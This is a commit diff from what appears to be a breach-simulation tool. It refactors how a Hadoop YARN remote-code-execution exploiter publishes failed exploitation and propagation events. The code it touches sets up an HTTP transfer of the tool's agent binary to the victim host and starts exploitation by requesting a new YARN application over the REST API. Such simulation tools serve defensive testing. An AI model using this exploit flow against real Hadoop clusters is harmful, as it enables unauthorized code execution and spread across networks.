Agent: Update hadoop failed event publishing

This commit is contained in:
Kekoa Kaaikala 2022-10-04 19:16:22 +00:00 committed by Gitea
parent 0ca68f79b4
commit 1b1273e350
1 changed files with 13 additions and 14 deletions

View File

@ -55,22 +55,13 @@ class HadoopExploiter(WebRCE):
)
return self.exploit_result
try:
monkey_path_on_victim = get_agent_dst_path(self.host)
except KeyError:
self.exploit_result.error_message = f"No coressponding agent found for {self.host}"
self._publish_exploitation_event(
target=self.host.ip_addr,
exploitation_success=False,
error_message=self.exploit_result.error_message,
tags=(HADOOP_EXPLOITER_TAG,),
)
return self.exploit_result
monkey_path_on_victim = get_agent_dst_path(self.host)
http_path, http_thread = HTTPTools.create_locked_transfer(
self.host, str(monkey_path_on_victim), self.agent_binary_repository
)
tags = (HADOOP_EXPLOITER_TAG, T1203_ATTACK_TECHNIQUE_TAG)
try:
command = self._build_command(monkey_path_on_victim, http_path)
@ -89,13 +80,21 @@ class HadoopExploiter(WebRCE):
propagation_success=True,
tags=(HADOOP_EXPLOITER_TAG, T1203_ATTACK_TECHNIQUE_TAG),
)
else:
error_message = f"Failed to exploit via {self.vulnerable_urls[0]}"
self._publish_exploitation_event(self.host.ip_addr, False, tags, error_message)
self._publish_propagation_event(self.host.ip_addr, False, tags, error_message)
except requests.RequestException as err:
error_message = str(err)
self._publish_exploitation_event(self.host.ip_addr, False, tags, error_message)
self._publish_propagation_event(self.host.ip_addr, False, tags, error_message)
finally:
http_thread.join(self.DOWNLOAD_TIMEOUT)
http_thread.stop()
return self.exploit_result
def exploit(self, url, command):
def exploit(self, url: str, command: str):
if self._is_interrupted():
self._set_interrupted()
return False
@ -104,8 +103,8 @@ class HadoopExploiter(WebRCE):
resp = requests.post(
posixpath.join(url, "ws/v1/cluster/apps/new-application"), timeout=LONG_REQUEST_TIMEOUT
)
resp = json.loads(resp.content)
app_id = resp["application-id"]
resp_dict = json.loads(resp.content)
app_id = resp_dict["application-id"]
# Create a random name for our application in YARN
# random.SystemRandom can block indefinitely in Linux